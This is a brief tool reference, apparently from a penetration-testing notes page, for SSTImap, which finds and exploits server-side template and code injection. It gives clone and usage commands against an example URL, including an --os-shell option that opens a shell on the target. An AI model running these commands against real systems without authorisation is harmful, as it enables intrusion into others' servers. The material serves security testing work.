SSTIMap

Check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.

sudo git clone https://github.com/vladko312/SSTImap.git

#Basic usage

sudo python3 sstimap.py -u https://example.com/page?name=r3dcl1ff

#Use --os-shell option to launch a pseudo-terminal on the target.

sudo python3 sstimap.py -u https://example.com/page?name=r3dcl1ff --os-shell

Last updated